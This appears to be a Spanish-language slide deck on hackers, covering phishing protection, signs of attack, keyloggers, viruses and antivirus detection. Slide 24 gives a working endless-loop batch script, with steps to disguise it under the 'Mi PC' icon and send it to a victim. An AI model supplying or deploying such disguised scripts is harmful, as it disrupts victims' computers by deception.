  • 19. Como protegerse de ataques de hackers Nunca proporcionar datos personales a un correo electrónico o un mensaje de “emergente” mientras en línea. Esto se llama phishing cuando un ladrón intenta conseguir que le dan sus datos. Instalar un software de seguridad de confianza y eficiente en el equipo de casa. Esto evitará que virus infecte su equipo y el robo de datos importantes. Mantener el software actualizado.
  • 20. Cómo descubrimos que estamos siendo atacados por un hacker Algunas de las formas de darse cuenta es cuando llegan muchos correos basura, o cuando llegan correos como del banco pidiendo contraseñas o peor cuando al revisar el ordenador se da uno cuenta que hay archivos corrompidos o que no estan y el computador tiene virus, que algunos no los detecta el antivirus.
  • 21. Como operan los hackers Los hackers principal recurso dependen, además de su propio ingenio, es un código informático. Si bien existe una gran comunidad de hackers en Internet, sólo un número relativamente pequeño de hackers en realidad el código del programa. Muchos hackers buscar y descargar el código escrito por otras personas. Hay miles de diferentes programas de los hackers utilizan para explorar las computadoras y redes. Estos programas dan a los piratas una gran cantidad de poder sobre los usuarios inocentes y las organizaciones - una vez un hacker experto sabe cómo funciona un sistema, se pueden diseñar programas que se aprovechan de ella.
  • 22. Programas Algunos de los programas que les facilitan son: Keyloggers:elprograma de registro de cada golpe de teclado, dando todo al hacker que tiene que infiltrarse en un sistema o incluso robar la identidad de alguien. virus: Los virus informáticos son programas diseñados para que se dupliquen y causar problemas que van desde estrellarse un equipo a exterminar a todo en el disco duro de un sistema
  • 23. Qué programa sirve para proteger las memorias usb de los virus Normalmente al llevar una usb tipo pendrive, lo que se supone es que si un equipo esta infectado, la usbtambien quede infectada, en la mayoria de los casos, por lo que antes de abrirla pasarle un antivirus, pues estos no son preventivos sino correctivos.
  • 24. Cómo se crea un virus 1. Abre el bloc de notas 2. Escribe el siguiente código: @echo off :a start start start start start start goto :a 3. Vete a archivo -> guardar como: Mi PC.bat , esto es el nombre del archivo, lo puedes llamar como quieras pero que termine en .bat. En tipo has de seleccionar todos los archivos 4. Puedes cambiar el icono por otro que te guste, por ejemplo por el de Mi PC, de esta manera pasará desapercibido. 5. Ya se lo puedes enviar a tu victima. Es un virus inofensivo, lo que hace el script, es abrir CMD seis veces continuamente y no tienes manera de detenerlo, simplemente reinicia el ordenador y el problema estará solucionado. Lo podemos considerar un truco del bloc de notas.
  • 25. Como se eliminan El software antivirus contrarresta de varias maneras los efectos de los virus informáticos para detectarlos. La mayoría de las soluciones se basan en tres componentes para la detección: exploración de acceso, exploración requerida, y suma de comprobación.